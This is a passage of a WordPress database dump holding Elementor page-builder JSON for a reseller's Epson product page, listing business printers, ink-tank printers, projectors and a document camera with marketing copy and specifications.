]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson LightScene EV-105<\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p>Document Camera ELPDC21\\u00a0<img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3995,2758,'_elementor_version','0.4'),(3998,2759,'_wp_page_template','template-fullwidth.php'),(3999,2759,'_elementor_edit_mode','builder'),(4000,2759,'_elementor_template_type','post'),(4001,2759,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-100\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-7711<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER 